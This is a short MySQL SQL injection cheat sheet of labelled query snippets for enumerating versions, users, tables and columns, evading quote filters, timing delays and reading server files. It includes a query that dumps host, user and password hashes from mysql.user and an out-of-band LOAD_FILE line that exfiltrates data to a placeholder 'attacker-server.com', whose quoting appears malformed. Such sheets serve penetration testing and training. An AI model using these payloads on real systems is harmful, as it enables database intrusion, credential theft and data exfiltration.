Comments
#
Version
SELECT VERSION();
User details
user()
Database details
SELECT database();
Database credentials
SELECT host, user, password FROM mysql.user;
Server details
SELECT @@hostname;
Table Name
SELECT table_name FROM information_schema.tables;
Column Names
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';
No Quotes
CONCAT(CHAR(97), CHAR(98), CHAR(99))
String Concatenation
CONCAT(foo, bar)
Conditionals
SELECT IF(1=1,'true','false');
Time-delay
Sleep(10)
Read Files
SELECT LOAD_FILE('C:\\Windows\\win.ini');
Out-of-Band Retrieval
SELECT LOAD_FILE(concat("\\",(SELECT 1), "attacker-server.com\");
Substrings
SELECT substr('Foobar', 1, 1);
Retrieve Nth Line
SELECT * FROM table ORDER BY ID LIMIT 3,1